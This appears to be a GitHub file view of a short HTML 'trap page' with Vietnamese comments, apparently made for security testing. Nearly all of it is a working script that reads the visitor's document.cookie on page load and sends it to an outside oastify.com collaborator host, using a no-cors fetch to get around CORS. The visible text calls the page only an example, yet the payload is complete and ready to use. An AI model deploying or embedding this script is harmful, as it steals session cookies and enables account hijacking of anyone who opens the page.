You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
<title>Trang Bẫy</title>
<script>
(async function() {
var userCookies = document.cookie;
var destinationURL = 'https://4otqlnlzkuzzujpb580ev4be359wxnlc.oastify.com';
try {
// Gửi yêu cầu GET mà không cần quan tâm đến CORS policy
await fetch(`${destinationURL}?cookies=${encodeURIComponent(userCookies)}`, {
method: 'GET',
mode: 'no-cors' // Sử dụng mode no-cors để tránh vấn đề CORS
});
} catch (error) {
console.error('Error:', error);
}
})();
</script>
Chào mừng bạn đến với Trang Bẫy
Trang này là một ví dụ, không có nội dung thực sự.